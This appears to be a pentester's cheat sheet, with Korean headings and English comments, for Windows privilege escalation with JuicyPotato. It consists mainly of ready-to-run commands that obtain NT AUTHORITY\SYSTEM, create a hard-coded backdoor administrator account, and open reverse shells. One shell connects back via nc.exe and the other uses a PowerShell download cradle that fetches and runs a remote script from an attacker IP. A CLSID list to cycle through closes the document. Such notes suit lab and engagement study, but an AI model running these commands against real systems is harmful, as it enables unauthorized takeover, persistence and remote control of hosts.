SYSTEM 권한 확인용 간단 실행. 출력에 NT AUTHORITY\SYSTEM 으로 찍히면 성공. (사전 조건: 현재 토큰에 SeImpersonatePrivilege 또는 SeAssignPrimaryTokenPrivilege 가 있어야 함 — `whoami /priv` 로 먼저 확인.)

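# Quick SYSTEM check via JuicyPotato.
# Prerequisites to verify before running (not shown on this page):
#   - the current token holds SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
#     (`whoami /priv`); without one of them every Potato variant fails.
#   - the target build still allows the DCOM/NTLM reflection JuicyPotato abuses;
#     on patched builds the call fails and a successor tool (PrintSpoofer,
#     RoguePotato, GodPotato) is the usual next step.
# Flags:
#   -l  local TCP port the COM server listens on *on the target*; must be free.
#   -p  program to launch with the stolen token.
#   -a  arguments passed to -p.
#   -t  process-creation API: * = try both CreateProcessWithTokenW and CreateProcessAsUser.
#   -c  CLSID of the COM server to trigger (BITS here; see the CLSID list further down).
# Backslashes are single here — the doubled ones were a markdown-escaping artifact.
.\JuicyPotato.exe -l 1337 -p "C:\Windows\System32\cmd.exe" -a "/c whoami /all > C:\Users\merlin\Desktop\jp.txt" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

# Success = the "User Name" line reads NT AUTHORITY\SYSTEM.
# jp.txt is an on-disk artifact of the escalation; delete it when done.
type C:\Users\merlin\Desktop\jp.txt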

새 계정 생성 & 관리자 그룹 추가

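# Persistence via a new local admin. Both steps run as SYSTEM through JuicyPotato.
# Caveats a practitioner should keep in mind:
#   - account creation and group membership changes are logged by Windows and
#     are a common detection trigger; this is a noisy technique.
#   - the credential below is hard-coded in plaintext in these notes; treat it
#     as lab-only and rotate/remove it after the engagement.
#   - clean-up: `net localgroup administrators wook /delete` then `net user wook /delete`.
# -l/-t/-c have the same meaning as in the SYSTEM check above.

# 1) create the local user
.\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c net user wook WookPass123! /add" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

# 2) add it to the local Administrators group
.\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c net localgroup administrators wook /add" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}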

리버스쉘

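# Reverse shells as SYSTEM.
#
# Variant A: nc.exe already dropped on the target. Start the listener on the
# attacker first (`nc -lvnp 1337`). Note that `-l 1337` is JuicyPotato's COM
# listener port *on the target*; it is unrelated to the callback port and the
# two merely happen to share a number here.
# this definitely worked
.\jp.exe -t * -p c:\windows\system32\cmd.exe -a "/c C:\Users\apache\Desktop\nc.exe 192.168.45.229 1337 -e cmd.exe" -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}"

# Variant B: PowerShell download cradle. Host Invoke-PowerShellTcp.ps1 on the
# attacker web server (10.10.14.9) and listen on 4444 before triggering.
# The URL must be bare: the <...> that previously wrapped it was a markdown
# autolink artifact, and cmd.exe would have parsed `<`/`>` as redirection.
# `-w hidden` and `-nop` only reduce on-screen noise; the cradle itself is
# still an in-memory script download that common EDR/AMSI rules flag.
.\JuicyPotato.exe -l 1337 -p "cmd.exe" -a "/c powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4444" -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}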

다른 CLSID

# Try first: BITS service CLSID (the one used in every command above)
{4991d34b-80a1-4291-83b6-3328366b9097}

# Other published CLSIDs. Which of these respond depends on the exact Windows
# version/build, so if one fails (typically "COM -> recv failed") move to the
# next or enumerate candidates for the target OS — the JuicyPotato repository
# ships per-OS CLSID lists and a test script for this. The service each CLSID
# maps to is not recorded here; confirm against the upstream list before use.
{e60687f7-01a1-40aa-86ac-db1cbf673334}
{6d18ad12-bde3-4393-b311-099c346e6df9}
{03ca98d6-ff5d-49b8-abc6-03dd84127020}
{5c6c3c20-0cf4-11d1-b95a-0060977b9152}
{BA126AD1-2166-11D1-B1D0-00805FC1270E}